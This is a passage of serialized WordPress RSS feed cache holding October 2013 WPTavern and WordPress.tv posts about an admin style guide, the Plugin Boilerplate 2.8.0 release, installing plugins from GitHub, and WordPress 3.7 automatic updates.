into the WordPress admin. It will also help to speed up that process when developers can quickly get the appropriate styles from the reference. </p>\n<p>Custom admin UI done wrong can be a scary thing. How many times have you seen a plugin with visually jarring alerts and mismatched styles in the admin? That Sore Thumb plugin is a hazard to the eyes. If only there was a guide to help put them on the right path. That&#8217;s where this project can benefit the community.</p>\n<p>Contribution to the <a href=\"https://github.com/helenhousandi/wp-style-guide\" target=\"_blank\">WordPress Style Guide</a> is open to all. If you&#8217;d like to help build it, feel free to send a pull request and/or leave feedback in the <a href=\"https://github.com/helenhousandi/wp-style-guide/issues\" target=\"_blank\">issues</a> queue. </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/so0jFriSR-M\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 17:42:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"WordPress.tv: Kane Jamison: 30 Ways to Move Beyond Basic Blog Content\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24403\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wordpress.tv/2013/10/29/kane-jamison-30-ways-to-move-beyond-basic-blog-content/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:687:\"<div id=\"v-T7Q0BhGt-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24403/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24403/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24403&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/29/kane-jamison-30-ways-to-move-beyond-basic-blog-content/\"><img alt=\"Kane Jamison: 30 Ways to Move Beyond Basic Blog Content\" src=\"http://videos.videopress.com/T7Q0BhGt/video-db37241b20_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 15:15:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WordPress.tv: Steve Zussino: How To Optimize Your Blog For Mobile Traffic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24405\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://wordpress.tv/2013/10/29/steve-zussino-how-to-optimize-your-blog-for-mobile-traffic/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:695:\"<div id=\"v-fPEjlXyV-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24405/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24405/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24405&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/29/steve-zussino-how-to-optimize-your-blog-for-mobile-traffic/\"><img alt=\"Steve Zussino: How To Optimize Your Blog For Mobile Traffic\" src=\"http://videos.videopress.com/fPEjlXyV/video-5e23b08fa8_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 14:56:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: Major Update Coming to the WordPress Plugin Boilerplate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"http://feedproxy.google.com/~r/WordpressTavern/~3/6panc40_WvQ/major-update-coming-to-the-wordpress-plugin-boilerplate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5211:\"<p>When <a title=\"Tom McFarlin\" href=\"http://tommcfarlin.com/\" target=\"_blank\">Tom McFarlin</a> released his <a title=\"WordPress Plugin Boilerplate\" href=\"https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate\" target=\"_blank\">WordPress Plugin Boilerplate</a> on github last November, he has no idea how many developers would jump on board to contribute to this open source learning resource. The plugin has received a ton of support from the community, including commits from more than 26 <a href=\"https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate/graphs/contributors\" target=\"_blank\">contributors</a>. McFarlin will soon be putting out a major release that will make the boilerplate better than ever.<span id=\"more-10542\"></span></p>\n<h3>An Introduction to the WordPress Plugin Boilerplate</h3>\n<div id=\"attachment_10583\" class=\"wp-caption aligncenter\"><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/medium_59044456.jpg\" rel=\"thumbnail\"><img class=\"size-full wp-image-10583\" alt=\"photo credit: Mr. Greenjeans via photopin cc\" src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/medium_59044456.jpg?resize=560%2C420\" /></a><p class=\"wp-caption-text\">photo credit: <a href=\"http://www.flickr.com/photos/gaylon/59044456/\">Mr. Greenjeans</a> via <a href=\"http://photopin.com\">photopin</a> <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a></p></div>\n<p>The plugin boilerplate provides the foundation for building a WordPress plugin. Based on the <a href=\"http://feeds2.feedburner.com/WordPress Plugin API.\" target=\"_blank\">WordPress Plugin API</a>, it provides example values for a basic plugin, so you can learn how to structure your own. All the basics are nicely documented within the plugin using <a href=\"http://en.wikipedia.org/wiki/PHPDoc\" target=\"_blank\">PHPDoc</a> conventions.</p>\n<h4>File organization matters.</h4>\n<p>Sometimes you find WordPress plugins with files scattered all over throughout random directories with no rhyme or reason. The <a href=\"https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate\" target=\"_blank\">WordPress Plugin Boilerplate</a> provides a standardized directory structure for maintaining your plugin&#8217;s assets.</p>\n<p>Here&#8217;s just a quick sampling of what you can learn from starting with the boilerplate:</p>\n<ul>\n<li>Register and enqueue public-facing JavaScript files</li>\n<li>Create a .pot as a starting translation file</li>\n<li>Make your plugin network-aware and compatible with WordPress multisite</li>\n<li>Register and enqueue admin-specific JavaScript and stylesheets</li>\n<li>Provide updates to your WordPress plugin from GitHub</li>\n</ul>\n<p>All of the above and so much more is documented inside the plugin boilerplate with links to where you can find more information. This is a very valuable resource for anyone who wants to get started with best practices in developing WordPress plugins.</p>\n<h3>WordPress Plugin Boilerplate 2.8.0 Will Be a Major Update</h3>\n<p>Many developers have been eager to contribute to the project and McFarlin announced that a <a href=\"http://tommcfarlin.com/preparing-wordpress-plugin-boilerplate-2-8-0/\" target=\"_blank\">major release</a> of the accumulated community efforts is coming soon. Highlighted additions to this release include:</p>\n<ul>\n<li>Added an admin class</li>\n<li>Defining a section to provide links for recommended tools</li>\n<li>Adding a ‘GitHub Plugin URI’ to the wordpress-plugin header</li>\n<li>Fix loading textdomain when the plugin is symlinked</li>\n<li>Added multisite activation/deactivation functionality.</li>\n<li>Added empty array for dependency to fix version number.</li>\n<li>Removing a lot of whitespace, updating function comments, and comment blocks within a function, and making sure no comments exceed 80 characters</li>\n<li>Adding a ‘TODO’ so users can more easily find where all they need to supply the name of their plugin</li>\n<li>And <a href=\"https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate/blob/master/ChangeLog.md\" target=\"_blank\">much more</a>&#8230;</li>\n</ul>\n<h3>How Developers Can Help</h3>\n<p>McFarlin has a number of outstanding issues and discussions that he&#8217;d like to address before pushing out the next release. These include questions such as whether or not to move class files to their own subdirectory, the possibility of moving the assets directory, and more. If you can lend any wisdom on <a href=\"https://github.com/tommcfarlin/WordPress-Plugin-Boilerplate/issues?direction=desc&sort=created&state=open\" target=\"_blank\">these issues</a>, you&#8217;re invited to comment on McFarlin&#8217;s <a href=\"http://tommcfarlin.com/preparing-wordpress-plugin-boilerplate-2-8-0/\" target=\"_blank\">post</a>, issue a pull request or get in touch with him on <a href=\"https://twitter.com/tommcfarlin\" target=\"_blank\">Twitter</a>. This is a community effort that can only help to raise the standards for WordPress plugin development.</p>\n<p>Have any of you used this boilerplate to get started building plugins? Is there anything you would change about how it is structured?</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/6panc40_WvQ\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 22:18:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: How to Install WordPress Plugins Directly From Github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10037\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:115:\"http://feedproxy.google.com/~r/WordpressTavern/~3/tRC1n_fg3jk/how-to-install-wordpress-plugins-directly-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6687:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/github-logo.png\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/github-logo.png?resize=300%2C118\" alt=\"github-logo\" class=\"alignright size-medium wp-image-10534\" /></a>It&#8217;s amazing how much WordPress code is available on <a href=\"https://github.com/\" target=\"_blank\">github</a>. Many developers choose not to place their plugins on WordPress.org for one reason or another, but this makes their code less convenient for others to find. Using a plugin from github traditionally requires you to visit github, search for the plugin, download the zip file and upload it to your site to install.</p>\n<h3>An Easier Way to Find and Install WordPress Plugins Hosted on github</h3>\n<p><a href=\"http://pdclark.com/\" target=\"_blank\">Paul Clark</a> has created a plugin called <a href=\"https://github.com/brainstormmedia/github-plugin-search\" target=\"_blank\">Github Plugin Search</a> that will allow you to access and install WordPress plugins directly from your dashboard. He found a way to connect the <a href=\"http://developer.github.com/v3/search/\" target=\"_blank\">github code search API</a> to the WordPress plugin installer API. Here&#8217;s a quick demo of how this works:<span id=\"more-10037\"></span></p>\n<p><span class=\"embed-youtube\"></span></p>\n<h3>How does the plugin detect WordPress plugins hosted on github?</h3>\n<p>Intrigued by the idea, I tested the plugin and checked in with Paul to find out how the plugin is able to detect WordPress plugins hosted on github. He replied:</p>\n<blockquote><p>Github&#8217;s code search API is fairly new (like&#8230; it&#8217;s still in preview. You have to send a special header just to access it.). They don&#8217;t *exactly* provide enough power in their search to truly query for WordPress plugins or to aggressively search the contents of each individual plugin.</p>\n<p>To get around their limitations (limits on number of queries, no ability to match exact text like &#8220;Plugin Name&#8221;), I&#8217;m using a combination of two searches, comparing the results, and then filtering down to repositories I&#8217;m confident are installable WordPress plugins.</p></blockquote>\n<p>Paul outlined three requirements a repository must meet in order to be found by his github search plugin:</p>\n<ul>\n<li>Be a PHP file</li>\n<li>Be in the top level of the repository</li>\n<li>Have a comment block at the top of the file that matches a WordPress plugin header, with &#8220;Plugin Name:&#8221; and &#8220;Plugin URI:&#8221; in a comment block at the top. (This plugin header format is pretty unique — no other PHP systems I know of follow the same format.)</li>\n</ul>\n<p>Right now, the plugin full-on replaces the search with results from github. It&#8217;s not such a big deal because of the github wp-plugins mirror, but Paul would like to add an option to toggle between wordpress.org and github results in the future. </p>\n<div id=\"attachment_10561\" class=\"wp-caption aligncenter\"><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/example-results.jpg\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/example-results.jpg?resize=560%2C388\" alt=\"Example results from searching github\" class=\"size-full wp-image-10561\" /></a><p class=\"wp-caption-text\">Example results from searching github</p></div>\n<p>Currently, the results returned are very basic, but Paul said that this is due to working within the confines of the API in preview:</p>\n<blockquote><p>When the Github API comes out of preview, I expect to be able to make results more accurate. Right now, logged in users can only make 20 queries every few minutes. All their other APIs allow 5000. I expect they&#8217;ll change it over when it&#8217;s final. When they do, the plugin could go crazy getting exact details on plugin files, running checks, and providing richer data from the readme and screenshots.</p></blockquote>\n<h3>How Can Users Get Updates For New Stable Versions of Plugins Hosted on github?</h3>\n<p>I asked Paul if users would still be able to get updates for their plugins if they install from github. This is imperative, because a user wouldn&#8217;t want to unknowingly exclude himself from future updates. &#8220;The WordPress update API works based on the plugin name, not the source,&#8221; Paul explained. &#8220;So, if a user were to *install* wp-seo from Github right now, updates from wordpress.org would still work.&#8221; </p>\n<p>Paul wrote a plugin a year or so ago that updates plugins from Github, Bitbucket, or generic Git repositories (public or private), if the URL is mentioned in the plugin header. It works nicely for him on client sites but in the current version of the Github Plugin Search he has it turned off. He outlines his concerns and the reasons why: </p>\n<ul>\n<li>In the current update plugin, the Git URL is set in the header. If all plugins are going to update, I need to generate and store that information for each plugin installed.</li>\n<li>The current updater updates when a new version is tagged in Github. Many WordPress developers aren&#8217;t in the habit of doing that (it&#8217;s the Git way of marking a new version, not the WordPress way), so to work with all plugins, I&#8217;d need to modify it to get the version number from the remote readme file. It&#8217;s possible to do that, just takes some time.</li>\n<li>If the update system is going to be replaced, users should also probably get a user interface to show them which plugins that&#8217;s happening for, and allow them to enable or disable it. There&#8217;s no reason, other than time, that those concerns couldn&#8217;t be resolved in the future.</li>\n</ul>\n<h3>The Future of Github Plugin Search</h3>\n<p>So as you can see, the plugin is still a work in progress but a very solid proof of concept so far. Paul plans to continue improvements to the plugin. In the future he may add in the fork and star count for the github repos in order to provide more data for users when selecting plugins. He&#8217;s created a list of <a href=\"https://github.com/brainstormmedia/github-plugin-search/issues?labels=enhancement&page=1&state=open\" target=\"_blank\">enhancements</a> that may come further down the road.</p>\n<p>If you&#8217;d like to fork the Github Search Plugin or suggest changes, check it out on <a href=\"https://github.com/brainstormmedia/github-plugin-search\" target=\"_blank\">github</a> or get in touch with Paul via <a href=\"https://twitter.com/pdclark\" target=\"_blank\">Twitter</a>.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/tRC1n_fg3jk\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 18:31:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: WordPress Automatic Updates – No Options For You!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10527\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"http://feedproxy.google.com/~r/WordpressTavern/~3/rVDGIkXIPyc/wordpress-automatic-updates-no-options-for-you\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8074:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/WordPress37Schedule.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/WordPress37Schedule.jpg?resize=215%2C179\" alt=\"WordPress 3.7 Development Schedule\" class=\"alignright size-full wp-image-10528\" /></a>Now that WordPress 3.7 is out in the wild and has already <a href=\"http://wordpress.org/download/counter/\" title=\"http://wordpress.org/download/counter/\">accumulated over 1.5 million downloads</a>, the complaints are starting to roll in concerning the automatic update feature. On the Make.WordPress.core website where Andrew Nacin <a href=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/\" title=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/\">published a great guide</a> on the different ways of configuring auto updates, users <a href=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/#comment-10923\" title=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/#comment-10923\">started questioning</a> why there wasn&#8217;t an option in the back-end to either opt-out of auto updates or to configure how they operate. <span id=\"more-10527\"></span></p>\n<p>The answer to that question is simple as pointed out by Andrew Nacin.</p>\n<blockquote><p>For the betterment of the web, we made a conscious decision to avoid a UI option. You’d be out of your mind to consciously avoid updating to fix a critical bug or security issue. We think the vast majority of users (many who don’t even know what PHP is) will celebrate this as a win in usability and security.</p>\n<p>We very strongly pride in our <a href=\"http://wordpress.org/about/philosophy/\" title=\"http://wordpress.org/about/philosophy/\">core philosophies</a>, including designing for the majority, making WordPress work out of the box with little configuration or setup, choosing decisions instead of adding options, and striving for simplicity. (Incidentally, that last section needs updating to emphasize we’ve now made updates even simpler.)\n</p></blockquote>\n<h3>No Auto Updates For Desktop Software But Enabled For WordPress</h3>\n<p>I don&#8217;t have a single piece of software on my desktop or notebook that has been configured to automatically update itself. Instead, I always make sure I&#8217;m notified before any updates are to be installed. I usually review the changelog and then update as needed. With WordPress however, I&#8217;m willing to allow auto updates for minor and security releases to be enabled for two reasons. The first is that this site is constantly being backed up by <a href=\"http://vaultpress.com/\" title=\"http://vaultpress.com/\">VaultPress</a>. I&#8217;m not worried if the site breaks during or after an upgrade. The second, I&#8217;ve rarely ever had a problem with WordPress upgrades.</p>\n<h3>There Are No Guarantees</h3>\n<p>The same concerns that were brought up when automatic updates were announced are still being voiced. The biggest concern users have is not being able to easily go back to a working version of WordPress should something break. At the crux of this particular concern is that automatic updates prevent people from creating backups immediately before the update process. The update process has <strong>failsafe</strong> after <strong>failsafe</strong> to prevent catastrophes from happening but there is no guarantee. By default in WordPress 3.7 and above, the only updates that will happen automatically are minor and security releases. Although they have different names, these releases can sometimes be the same thing. Andrew Nacin <a href=\"http://www.wptavern.com/how-to-configure-automatic-core-updates-for-wordpress-3-7#comment-48104\" title=\"http://www.wptavern.com/how-to-configure-automatic-core-updates-for-wordpress-3-7#comment-48104\">explained the differences</a>.  </p>\n<p>It&#8217;s been stressed that these minor and security updates rarely break anything dealing with the core of WordPress. However, sometimes these minor changes cause a plugin or theme to break. Rarely doesn&#8217;t mean never. It&#8217;s this slight possibility of a site breaking that has prevented people from jumping on board to support the feature. </p>\n<h3>How To Make Upgrading Less Fearful</h3>\n<p>The best article I&#8217;ve read so far on this topic is from Mika Epstein entitled, <a href=\"http://halfelf.org/2013/dont-fear-the-auto-update/\" title=\"http://halfelf.org/2013/dont-fear-the-auto-update/\">Don&#8217;t Fear The Auto Update</a>. While she doesn&#8217;t dismiss the fact that a site can break during an auto update, she provides a number of great tips that you can use so that upgrading is less of a frightful experience.</p>\n<blockquote><p>Yes, it’s defaulted to “on” because after intensive testing, and careful thought, WordPress core devs are pretty darn sure that these minor updates, which are more often than not security related, will not break a site. I’ll get back to breaking sites in a second. The point is that minor updates were picked specifically because it’s known that major upgrades can often break things.</p></blockquote>\n<p>If every time you upgrade WordPress, your site breaks, please follow her advice and do a plugin/theme audit.</p>\n<h3>My Thoughts</h3>\n<p>Normally, I&#8217;d be in support of adding an option to allow users to configure how auto updates work. In this case however, I understand the big picture. With WordPress being used on 20% of the web, the team owes it to the web in general to help users as best they can, keep their sites up to date. This tweet by Andrew Nacin is a good example of the big picture.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>It will take a while to feel the true effects of WordPress 3.7. # sites running secure versions will go up. # localized installs will go up.</p>\n<p>&mdash; Andrew Nacin (@nacin) <a href=\"https://twitter.com/nacin/statuses/393255192617312256\">October 24, 2013</a></p></blockquote>\n<p></p>\n<p>The concerns raised are warranted and it only takes one experience of an auto update breaking a site to ruin things. Meanwhile, there were over 100,000 auto updates applied during the WordPress 3.7 testing period and not a single one of them failed according to Andrew Nacin.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>We ended the WordPress 3.7 beta cycle with 112,434 automatic background updates attempted and not a single critical failure.</p>\n<p>&mdash; Andrew Nacin (@nacin) <a href=\"https://twitter.com/nacin/statuses/393547010801803264\">October 25, 2013</a></p></blockquote>\n<p></p>\n<p>Many of the terrible scenarios discussed are hypothetical situations. I say we give 3.7 and 3.7.1 some time and let&#8217;s see if auto updates do more harm than good. After 3.7.1 is released, WordPress.org will have a lot of useful data which I hope the team shares with everyone. </p>\n<h3>Update Control Gives You All The Automatic Update Options You Need</h3>\n<p>If you are looking for a plugin that adds options to the WordPress back-end to easily configure how auto updates work, check out <a href=\"http://wordpress.org/plugins/update-control/\" title=\"http://wordpress.org/plugins/update-control/\">Update Control</a>. This plugin provides all of the auto update options you could ever want! No need to hack WP-Config or use constants. </p>\n<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/autoupdateoptions.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/autoupdateoptions.jpg?resize=300%2C288\" alt=\"Auto Update Plugin Options\" class=\"aligncenter size-medium wp-image-10546\" /></a></p>\n<p>I can&#8217;t wait to revisit this topic after the release of 3.7.1. By then, the core team will have some real world data to analyze. </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/rVDGIkXIPyc\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 17:30:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Changing The WordPress Admin Username During 